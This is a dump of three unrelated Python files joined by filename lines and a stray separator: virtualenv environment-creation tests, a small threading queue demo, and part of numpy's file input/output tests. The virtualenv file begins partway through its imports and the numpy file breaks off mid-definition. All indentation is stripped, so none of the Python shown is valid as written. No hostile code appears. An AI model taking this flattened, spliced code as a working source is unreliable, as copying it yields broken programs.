from virtualenv.create.creator import DEBUG_SCRIPT, Creator, get_env_debug_info
from virtualenv.create.via_global_ref.builtin.cpython.cpython2 import CPython2PosixBase
from virtualenv.create.via_global_ref.builtin.cpython.cpython3 import CPython3Posix
from virtualenv.create.via_global_ref.builtin.python2.python2 import Python2
from virtualenv.discovery.py_info import PythonInfo
from virtualenv.info import IS_PYPY, IS_WIN, PY2, PY3, fs_is_case_sensitive
from virtualenv.pyenv_cfg import PyEnvCfg
from virtualenv.run import cli_run, session_via_cli
from virtualenv.util.path import Path
from virtualenv.util.six import ensure_str, ensure_text
CURRENT = PythonInfo.current_system()
def test_os_path_sep_not_allowed(tmp_path, capsys):
target = str(tmp_path / "a{}b".format(os.pathsep))
err = _non_success_exit_code(capsys, target)
msg = (
"destination {!r} must not contain the path separator ({}) as this"
" would break the activation scripts".format(target, os.pathsep)
)
assert msg in err, err
def _non_success_exit_code(capsys, target):
with pytest.raises(SystemExit) as context:
run_with_catch(args=[target])
assert context.value.code != 0
out, err = capsys.readouterr()
assert not out, out
return err
def test_destination_exists_file(tmp_path, capsys):
target = tmp_path / "out"
target.write_text("")
err = _non_success_exit_code(capsys, str(target))
msg = "the destination {} already exists and is a file".format(str(target))
assert msg in err, err
@pytest.mark.skipif(sys.platform == "win32", reason="Windows only applies R/O to files")
def test_destination_not_write_able(tmp_path, capsys):
if hasattr(os, "geteuid"):
if os.geteuid() == 0:
pytest.skip("no way to check permission restriction when running under root")
target = tmp_path
prev_mod = target.stat().st_mode
target.chmod(S_IREAD | S_IRGRP | S_IROTH)
try:
err = _non_success_exit_code(capsys, str(target))
msg = "the destination . is not write-able at {}".format(str(target))
assert msg in err, err
finally:
target.chmod(prev_mod)
def cleanup_sys_path(paths):
from virtualenv.create.creator import HERE
paths = [p.resolve() for p in (Path(os.path.abspath(i)) for i in paths) if p.exists()]
to_remove = [Path(HERE)]
if os.environ.get(str("PYCHARM_HELPERS_DIR")):
to_remove.append(Path(os.environ[str("PYCHARM_HELPERS_DIR")]).parent)
to_remove.append(Path(os.path.expanduser("~")) / ".PyCharm")
result = [i for i in paths if not any(str(i).startswith(str(t)) for t in to_remove)]
return result
@pytest.fixture(scope="session")
def system(session_app_data):
return get_env_debug_info(Path(CURRENT.system_executable), DEBUG_SCRIPT, session_app_data)
CURRENT_CREATORS = list(i for i in CURRENT.creators().key_to_class.keys() if i != "builtin")
CREATE_METHODS = []
for k, v in CURRENT.creators().key_to_meta.items():
if k in CURRENT_CREATORS:
if v.can_copy:
CREATE_METHODS.append((k, "copies"))
if v.can_symlink:
CREATE_METHODS.append((k, "symlinks"))
_VENV_BUG_ON = (
IS_PYPY
and CURRENT.version_info[0:3] == (3, 6, 9)
and CURRENT.pypy_version_info[0:2] == [7, 3]
and CURRENT.platform == "linux"
)
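# _VENV_BUG_ON is True only for PyPy 3.6.9 / PyPy 7.3 on Linux, the
# combination affected by the upstream venv "copies" bug linked below.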
@pytest.mark.parametrize(
"creator, isolated",
[
pytest.param(
*i,
marks=pytest.mark.xfail(
reason="https://bitbucket.org/pypy/pypy/issues/3159/pypy36-730-venv-fails-with-copies-on-linux",
strict=True,
)
)
if _VENV_BUG_ON and i[0][0] == "venv" and i[0][1] == "copies"
else i
for i in product(CREATE_METHODS, ["isolated", "global"])
],
ids=lambda i: "-".join(i) if isinstance(i, tuple) else i,
)
def test_create_no_seed(python, creator, isolated, system, coverage_env, special_name_dir):
dest = special_name_dir
creator_key, method = creator
cmd = [
"-v",
"-v",
"-p",
ensure_text(python),
ensure_text(str(dest)),
"--without-pip",
"--activators",
"",
"--creator",
creator_key,
"--{}".format(method),
]
if isolated == "global":
cmd.append("--system-site-packages")
result = cli_run(cmd)
creator = result.creator
coverage_env()
if IS_PYPY:
# pypy cleans up file descriptors periodically so our (many) subprocess calls impact file descriptor limits
# force a close of these on systems where the limit is low-ish (e.g. macOS, 256)
gc.collect()
purelib = creator.purelib
patch_files = {purelib / "{}.{}".format("_virtualenv", i) for i in ("py", "pyc", "pth")}
patch_files.add(purelib / "__pycache__")
content = set(creator.purelib.iterdir()) - patch_files
assert not content, "\n".join(ensure_text(str(i)) for i in content)
assert creator.env_name == ensure_text(dest.name)
debug = creator.debug
assert "exception" not in debug, "{}\n{}\n{}".format(debug.get("exception"), debug.get("out"), debug.get("err"))
sys_path = cleanup_sys_path(debug["sys"]["path"])
system_sys_path = cleanup_sys_path(system["sys"]["path"])
our_paths = set(sys_path) - set(system_sys_path)
our_paths_repr = "\n".join(ensure_text(repr(i)) for i in our_paths)
# ensure we have at least one extra path added
assert len(our_paths) >= 1, our_paths_repr
# ensure all additional paths are related to the virtual environment
for path in our_paths:
msg = "\n{}\ndoes not start with {}\nhas:\n{}".format(
ensure_text(str(path)), ensure_text(str(dest)), "\n".join(ensure_text(str(p)) for p in system_sys_path),
)
assert str(path).startswith(str(dest)), msg
# ensure there's at least a site-packages folder as part of the virtual environment added
assert any(p for p in our_paths if p.parts[-1] == "site-packages"), our_paths_repr
# ensure the global site package is added or not, depending on flag
global_sys_path = system_sys_path[-1]
if isolated == "isolated":
msg = "global sys path {} is in virtual environment sys path:\n{}".format(
ensure_text(str(global_sys_path)), "\n".join(ensure_text(str(j)) for j in sys_path)
)
assert global_sys_path not in sys_path, msg
else:
common = []
for left, right in zip(reversed(system_sys_path), reversed(sys_path)):
if left == right:
common.append(left)
else:
break
def list_to_str(iterable):
return [ensure_text(str(i)) for i in iterable]
assert common, "\n".join(difflib.unified_diff(list_to_str(sys_path), list_to_str(system_sys_path)))
# test that the python executables in the bin directory are either:
# - files
# - absolute symlinks outside of the venv
# - relative symlinks inside of the venv
if sys.platform == "win32":
exes = ("python.exe",)
else:
exes = ("python", "python{}".format(*sys.version_info), "python{}.{}".format(*sys.version_info))
if creator_key == "venv":
# for venv, the repackaging does not include the pythonx.y executable
exes = exes[:-1]
for exe in exes:
exe_path = creator.bin_dir / exe
assert exe_path.exists(), "\n".join(str(i) for i in creator.bin_dir.iterdir())
if not exe_path.is_symlink(): # option 1: a real file
continue # it was a file
link = os.readlink(str(exe_path))
if not os.path.isabs(link): # option 2: a relative symlink
continue
# option 3: an absolute symlink, should point outside the venv
assert not link.startswith(str(creator.dest))
if IS_WIN and CURRENT.implementation == "CPython":
python_w = creator.exe.parent / "pythonw.exe"
assert python_w.exists()
assert python_w.read_bytes() != creator.exe.read_bytes()
if CPython3Posix.pyvenv_launch_patch_active(PythonInfo.from_exe(python)) and creator_key != "venv":
result = subprocess.check_output(
[str(creator.exe), "-c", 'import os; print(os.environ.get("__PYVENV_LAUNCHER__"))'],
universal_newlines=True,
).strip()
assert result == "None"
if isinstance(creator, CPython2PosixBase):
make_file = debug["makefile_filename"]
assert os.path.exists(make_file)
@pytest.mark.skipif(not CURRENT.has_venv, reason="requires interpreter with venv")
def test_venv_fails_not_inline(tmp_path, capsys, mocker):
if hasattr(os, "geteuid"):
if os.geteuid() == 0:
pytest.skip("no way to check permission restriction when running under root")
def _session_via_cli(args, options=None):
session = session_via_cli(args, options)
assert session.creator.can_be_inline is False
return session
mocker.patch("virtualenv.run.session_via_cli", side_effect=_session_via_cli)
before = tmp_path.stat().st_mode
cfg_path = tmp_path / "pyvenv.cfg"
cfg_path.write_text(ensure_text(""))
cfg = str(cfg_path)
try:
os.chmod(cfg, stat.S_IREAD | stat.S_IRGRP | stat.S_IROTH)
cmd = ["-p", str(CURRENT.executable), str(tmp_path), "--without-pip", "--creator", "venv"]
with pytest.raises(SystemExit) as context:
run(cmd)
assert context.value.code != 0
finally:
os.chmod(cfg, before)
out, err = capsys.readouterr()
assert "subprocess call failed for" in out, out
assert "Error:" in err, err
@pytest.mark.skipif(not sys.version_info[0] == 2, reason="python 2 only tests")
def test_debug_bad_virtualenv(tmp_path):
cmd = [str(tmp_path), "--without-pip"]
result = cli_run(cmd)
# if the site.py is removed/altered the debug should fail as no one is around to fix the paths
site_py = result.creator.stdlib / "site.py"
site_py.unlink()
# insert something that writes something on the stdout
site_py.write_text('import sys; sys.stdout.write(repr("std-out")); sys.stderr.write("std-err"); raise ValueError')
debug_info = result.creator.debug
assert debug_info["returncode"]
assert debug_info["err"].startswith("std-err")
assert "std-out" in debug_info["out"]
assert debug_info["exception"]
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("clear", [True, False], ids=["clear", "no_clear"])
def test_create_clear_resets(tmp_path, creator, clear, caplog):
caplog.set_level(logging.DEBUG)
if creator == "venv" and clear is False:
pytest.skip("venv without clear might fail")
marker = tmp_path / "magic"
cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator, "-vvv"]
cli_run(cmd)
marker.write_text("") # if we a marker file this should be gone on a clear run, remain otherwise
assert marker.exists()
cli_run(cmd + (["--clear"] if clear else []))
assert marker.exists() is not clear
@pytest.mark.parametrize("creator", CURRENT_CREATORS)
@pytest.mark.parametrize("prompt", [None, "magic"])
def test_prompt_set(tmp_path, creator, prompt):
cmd = [str(tmp_path), "--seeder", "app-data", "--without-pip", "--creator", creator]
if prompt is not None:
cmd.extend(["--prompt", "magic"])
result = cli_run(cmd)
actual_prompt = tmp_path.name if prompt is None else prompt
cfg = PyEnvCfg.from_file(result.creator.pyenv_cfg.path)
if prompt is None:
assert "prompt" not in cfg
else:
if creator != "venv":
assert "prompt" in cfg, list(cfg.content.keys())
assert cfg["prompt"] == actual_prompt
@pytest.mark.slow
def test_cross_major(cross_python, coverage_env, tmp_path, session_app_data, current_fastest):
cmd = [
"-p",
ensure_text(cross_python.executable),
ensure_text(str(tmp_path)),
"--no-setuptools",
"--no-wheel",
"--activators",
"",
]
result = cli_run(cmd)
pip_scripts = {i.name.replace(".exe", "") for i in result.creator.script_dir.iterdir() if i.name.startswith("pip")}
major, minor = cross_python.version_info[0:2]
assert pip_scripts == {
"pip",
"pip{}".format(major),
"pip-{}.{}".format(major, minor),
"pip{}.{}".format(major, minor),
}
coverage_env()
env = PythonInfo.from_exe(str(result.creator.exe), session_app_data)
assert env.version_info.major != CURRENT.version_info.major
def test_create_parallel(tmp_path, monkeypatch, temp_app_data):
def create(count):
subprocess.check_call(
[sys.executable, "-m", "virtualenv", "-vvv", str(tmp_path / "venv{}".format(count)), "--without-pip"]
)
threads = [Thread(target=create, args=(i,)) for i in range(1, 4)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_creator_input_passed_is_abs(tmp_path, monkeypatch):
monkeypatch.chdir(tmp_path)
result = Creator.validate_dest("venv")
assert str(result) == str(tmp_path / "venv")
@pytest.mark.skipif(os.altsep is None, reason="OS does not have an altsep")
def test_creator_replaces_altsep_in_dest(tmp_path):
dest = str(tmp_path / "venv{}foobar")
result = Creator.validate_dest(dest.format(os.altsep))
assert str(result) == dest.format(os.sep)
def test_create_long_path(current_fastest, tmp_path):
if sys.platform == "darwin":
max_shebang_length = 512
else:
max_shebang_length = 127
# filenames can be at most 255 chars long on macOS, so split into two levels
count = max_shebang_length - len(str(tmp_path))
folder = tmp_path / ("a" * (count // 2)) / ("b" * (count // 2)) / "c"
folder.mkdir(parents=True)
cmd = [str(folder)]
result = cli_run(cmd)
subprocess.check_call([str(result.creator.script("pip")), "--version"])
@pytest.mark.parametrize("creator", sorted(set(PythonInfo.current_system().creators().key_to_class) - {"builtin"}))
def test_create_distutils_cfg(creator, tmp_path, monkeypatch):
result = cli_run([ensure_text(str(tmp_path / "venv")), "--activators", "", "--creator", creator])
app = Path(__file__).parent / "console_app"
dest = tmp_path / "console_app"
shutil.copytree(str(app), str(dest))
setup_cfg = dest / "setup.cfg"
conf = dedent(
"""
[install]
prefix={0}{1}prefix
install_purelib={0}{1}purelib
install_platlib={0}{1}platlib
install_headers={0}{1}headers
install_scripts={0}{1}scripts
install_data={0}{1}data
""".format(
tmp_path, os.sep
)
)
setup_cfg.write_text(setup_cfg.read_text() + conf)
monkeypatch.chdir(dest) # distutils will read the setup.cfg from the cwd, so change to that
install_demo_cmd = [
str(result.creator.script("pip")),
"--disable-pip-version-check",
"install",
str(dest),
"--no-use-pep517",
"-vv",
]
subprocess.check_call(install_demo_cmd)
magic = result.creator.script("magic") # console scripts are created in the right location
assert magic.exists()
package_folder = result.creator.purelib / "demo" # prefix is set to the virtualenv prefix for install
assert package_folder.exists(), list_files(str(tmp_path))
def list_files(path):
result = ""
for root, _, files in os.walk(path):
level = root.replace(path, "").count(os.sep)
indent = " " * 4 * level
result += "{}{}/\n".format(indent, os.path.basename(root))
sub = " " * 4 * (level + 1)
for f in files:
result += "{}{}\n".format(sub, f)
return result
@pytest.mark.parametrize("python_path_on", [True, False], ids=["on", "off"])
@pytest.mark.skipif(PY3, reason="we rewrite sys.path only on PY2")
def test_python_path(monkeypatch, tmp_path, python_path_on):
result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", ""])
monkeypatch.chdir(tmp_path)
case_sensitive = fs_is_case_sensitive()
def _get_sys_path(flag=None):
cmd = [str(result.creator.exe)]
if flag:
cmd.append(flag)
cmd.extend(["-c", "import json; import sys; print(json.dumps(sys.path))"])
return [i if case_sensitive else i.lower() for i in json.loads(subprocess.check_output(cmd))]
monkeypatch.delenv(str("PYTHONPATH"), raising=False)
base = _get_sys_path()
# note the value result.creator.interpreter.system_stdlib cannot be set, as that would disable our custom site.py
python_paths = [
str(Path(result.creator.interpreter.prefix)),
str(Path(result.creator.interpreter.system_stdlib) / "b"),
str(result.creator.purelib / "a"),
str(result.creator.purelib),
str(result.creator.bin_dir),
str(tmp_path / "base"),
str(tmp_path / "base_sep") + os.sep,
"name",
"name{}".format(os.sep),
str(tmp_path.parent / (ensure_text(tmp_path.name) + "_suffix")),
".",
"..",
"",
]
python_path_env = os.pathsep.join(ensure_str(i) for i in python_paths)
monkeypatch.setenv(str("PYTHONPATH"), python_path_env)
extra_all = _get_sys_path(None if python_path_on else "-E")
if python_path_on:
assert extra_all[0] == "" # the cwd is always injected at start as ''
extra_all = extra_all[1:]
assert base[0] == ""
base = base[1:]
assert not (set(base) - set(extra_all)) # all base paths are present
abs_python_paths = list(OrderedDict((os.path.abspath(ensure_text(i)), None) for i in python_paths).keys())
abs_python_paths = [i if case_sensitive else i.lower() for i in abs_python_paths]
extra_as_python_path = extra_all[: len(abs_python_paths)]
assert abs_python_paths == extra_as_python_path # python paths are there at the start
non_python_path = extra_all[len(abs_python_paths) :]
assert non_python_path == [i for i in base if i not in extra_as_python_path]
else:
assert base == extra_all
@pytest.mark.skipif(
not (CURRENT.implementation == "CPython" and PY2),
reason="stdlib components without py files only possible on CPython2",
)
@pytest.mark.parametrize(
"py, pyc",
list(
product(
[True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[2] else [False],
[True, False] if Python2.from_stdlib(Python2.mappings(CURRENT), "os.pyc")[2] else [False],
)
),
)
def test_py_pyc_missing(tmp_path, mocker, session_app_data, py, pyc):
"""Ensure that creation can succeed if os.pyc exists (even if os.py has been deleted)"""
previous = Python2.from_stdlib
def from_stdlib(mappings, name):
path, to, exists = previous(mappings, name)
if name.endswith("py"):
exists = py
elif name.endswith("pyc"):
exists = pyc
return path, to, exists
mocker.patch.object(Python2, "from_stdlib", side_effect=from_stdlib)
result = cli_run([ensure_text(str(tmp_path)), "--without-pip", "--activators", "", "-vv"])
py_at = Python2.from_stdlib(Python2.mappings(CURRENT), "os.py")[1](result.creator, Path("os.py"))
py = pyc is False or py  # if pyc is False we fall back to serving the py, which will exist (as we only mock the check)
assert py_at.exists() is py
pyc_at = Python2.from_stdlib(Python2.mappings(CURRENT), "os.pyc")[1](result.creator, Path("os.pyc"))
assert pyc_at.exists() is pyc
def test_zip_importer_can_import_setuptools(tmp_path):
"""We're patching the loaders so might fail on r/o loaders, such as zipimporter on CPython<3.8"""
result = cli_run([str(tmp_path / "venv"), "--activators", "", "--no-pip", "--no-wheel", "--copies"])
zip_path = tmp_path / "site-packages.zip"
with zipfile.ZipFile(str(zip_path), "w", zipfile.ZIP_DEFLATED) as zip_handler:
lib = str(result.creator.purelib)
for root, _, files in os.walk(lib):
base = root[len(lib) :].lstrip(os.pathsep)
for file in files:
if not file.startswith("_virtualenv"):
zip_handler.write(filename=os.path.join(root, file), arcname=os.path.join(base, file))
for folder in result.creator.purelib.iterdir():
if not folder.name.startswith("_virtualenv"):
if folder.is_dir():
shutil.rmtree(str(folder), ignore_errors=True)
else:
folder.unlink()
env = os.environ.copy()
env[str("PYTHONPATH")] = str(zip_path)
subprocess.check_call([str(result.creator.exe), "-c", "from setuptools.dist import Distribution"], env=env)
|
queue_operations.py | import queue
import threading
def my_subscriber(queue_p):
while True:
item = queue_p.get()
if item is None:
break
print("{} removed {} from the queue".format(threading.current_thread(), item))
print("Queue Size is now: {}".format(queue_p.qsize()))
queue_p.task_done()
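# A None item acts as a shutdown sentinel: each consumer thread exits its
# loop when it dequeues one (sentinels are pushed after myQueue.join() below).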
myQueue = queue.Queue()
for i in range(10):
myQueue.put(i)
print("Queue Populated")
threads = []
for i in range(4):
thread = threading.Thread(target=my_subscriber, args=(myQueue,))
thread.start()
threads.append(thread)
myQueue.join()
# All items processed; push one None sentinel per consumer so each thread
# exits its loop, then join the threads so the program can terminate.
for i in range(4):
myQueue.put(None)
for thread in threads:
thread.join()
|
test_io.py | from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes, bytes, Path
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles,
)
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
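# Minimal illustration (hypothetical snippet, not part of the test suite):
#   t = TextIO()
#   t.write("1 2\n")  # str is transparently encoded to bytes
#   t.seek(0)
#   t.read()          # -> b'1 2\n'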
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
try:
import bz2
HAS_BZ2 = True
except ImportError:
HAS_BZ2 = False
try:
import lzma
HAS_LZMA = True
except ImportError:
HAS_LZMA = False
def strptime(s, fmt=None):
"""
This function is available in the datetime module only from Python >=
2.5.
"""
if type(s) == bytes:
s = s.decode("latin1")
return datetime(*time.strptime(s, fmt)[:3])
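# e.g. strptime("2001-01-31", "%Y-%m-%d") -> datetime.datetime(2001, 1, 31, 0, 0)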
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
target_file = NamedTemporaryFile(delete=False)
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
try:
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
finally:
if not isinstance(target_file, BytesIO):
target_file.close()
# holds an open file descriptor so it can't be deleted on win
if 'arr_reloaded' in locals():
if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
os.remove(target_file.name)
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
@pytest.mark.slow
def test_format_2_0(self):
dt = [(("%d" % i) * 100, float) for i in range(500)]
a = np.ones(1000, dtype=dt)
with warnings.catch_warnings(record=True):
warnings.filterwarnings('always', '', UserWarning)
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
try:
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
finally:
# delete tempfile, must be done here on windows
if self.arr_reloaded.fid:
self.arr_reloaded.fid.close()
os.remove(self.arr_reloaded.fid.name)
@pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
@pytest.mark.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a'] # Should succeed
npfile.close()
del a # Avoid pyflakes unused variable warning.
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_BagObj(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
assert_equal(a, l.f.file_a)
assert_equal(b, l.f.file_b)
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and that savez works in a multithreaded environment
def writer(error_list):
with temppath(suffix='.npz') as tmp:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify we can seek on the 'loaded' file
with temppath(suffix='.npz') as tmp:
with open(tmp, 'wb') as fp:
np.savez(fp, data='LOVELY LOAD')
with open(tmp, 'rb', 10000) as fp:
fp.seek(0)
assert_(not fp.closed)
np.load(fp)['data']
# fp must not get closed by .load
assert_(not fp.closed)
fp.seek(0)
assert_(not fp.closed)
#FIXME: Is this still true?
@pytest.mark.skipif(IS_PYPY, reason="Missing context manager on PyPy")
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
with temppath(suffix='.npz') as tmp:
np.savez(tmp, data='LOVELY LOAD')
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with suppress_warnings() as sup:
sup.filter(Warning) # TODO: specify exact message
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns the file and can close it. This needs to
# pass a file name to load for the test. On Windows a failure will
# cause a second error to be raised when the attempt to remove
# the open file is made.
prefix = 'numpy_test_closing_zipfile_after_load_'
with temppath(suffix='.npz', prefix=prefix) as tmp:
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(object):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_0D_3D(self):
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, np.array(1))
assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))
def test_structured(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_structured_padded(self):
# gh-13297
a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
])
c = BytesIO()
np.savetxt(c, a[['foo', 'baz']], fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
def test_multifield_view(self):
a = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
v = a[['x', 'z']]
with temppath(suffix='.npy') as path:
path = Path(path)
np.save(path, v)
data = np.load(path)
assert_array_equal(data, v)
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
# Test the functionality of the header and footer keyword argument.
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
